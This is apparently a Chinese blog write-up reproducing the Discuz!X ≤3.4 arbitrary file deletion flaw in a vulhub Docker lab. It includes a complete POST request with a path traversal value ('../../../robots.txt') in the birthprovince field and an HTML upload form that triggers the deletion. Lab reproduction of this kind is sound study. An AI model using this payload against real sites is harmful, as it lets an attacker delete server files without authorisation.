Discuz!X ≤3.4 任意文件删除漏洞
1.漏洞影响版本
Discuz!X ≤3.4
2.漏洞危害
任意文件删除
3.漏洞POC
cd /root/vulhub/discuz/x3.4-arbitrary-file-deletion //进入本次复现的漏洞目录
docker-compose up -d //docker-compose搭建环境
搭建成功
安装时,只用修改数据库地址为db,其他保持默认即可
安装Discuz
访问http://your-ip/robots.txt可见robots.txt是存在的:
访问robots.txt
进入个人设置界面,在源码中CTRL+F搜索formhash,访问:
http://192.168.11.147/home.php?mod=spacecp&ac=profile&op=base
formhash
带上cookie,formhash,发送如下数据包
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
[your formhash]
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--
robots.txt
本地新建upload.html,写入如下html代码
<body>
<form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[your-formhash]" method="post" enctype="multipart/form-data">
<input type="file" name="birthprovince" />
<input type="submit" value="upload" />
</form>
</body>
upload.html
上传一张普通图片即可
上传成功
robots.txt已经删除
robots.txt删除
4.复盘
漏洞出现原因
核心问题在upload/source/include/spacecp/spacecp_profile.php
参考URL:LoRexxar
总结
1.之前的Aria2文章,经朋友反馈,出现了错误的地方,今日我重新做一遍,并且改进具体过程。(欢迎各位大佬指导,联系邮箱:xu515727574@163.com)
2.最近在学习python:练习,进步。
3.目标:追寻大佬,模仿大佬,与大佬同行。
网友评论